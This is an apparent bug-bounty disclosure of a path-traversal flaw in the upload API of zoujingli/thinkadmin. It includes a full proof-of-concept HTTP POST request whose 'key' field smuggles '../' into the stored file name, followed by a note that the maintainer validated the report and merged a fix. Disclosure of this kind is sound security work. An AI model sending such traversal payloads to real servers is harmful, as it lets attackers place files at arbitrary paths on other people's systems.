External Control of File Name or Path in zoujingli/thinkadmin

Valid

Reported on

Sep 15th 2021


Description

upload file to any path

Proof of Concept

User can upload file to any path by path-traversal

POST /admin/api.upload/file.html HTTP/2
Host: v6.thinkadmin.top
Cookie: lang=zh-cn; PHPSESSID=88a2945fb139bb74f87137d2144709ab; limit=20
Content-Length: 14170
Sec-Ch-Ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"
Accept: text/plain, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAn0D7Qsi6kRX5BBr
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://v6.thinkadmin.top
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://v6.thinkadmin.top/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="key"

e4/../949bdb5f9077bfed982ca9b7bfadbeb.jpg
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="safe"

0
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="uptype"

local
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="file"; filename="aaa.jpg"
Content-Type: image/jpeg

ÿØÿà

Here see i can traverse path e4/../949bdb5f9077bfed982ca9b7bfadbeb.jpg and it will upload file .
Now you can access file by going https://v6.thinkadmin.top//upload/949bdb5f9077bfed982ca9b7bfadbeb.jpg .

Impact

This vulnerability is capable of...

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back 8 days ago
邹景立 validated this vulnerability 8 days ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 confirmed that a fix has been merged on 29b05d 8 days ago
邹景立 has been awarded the fix bounty
邹景立
8 days ago

Maintainer


Subsequent adjustment:

https://gitee.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Upload.php#L115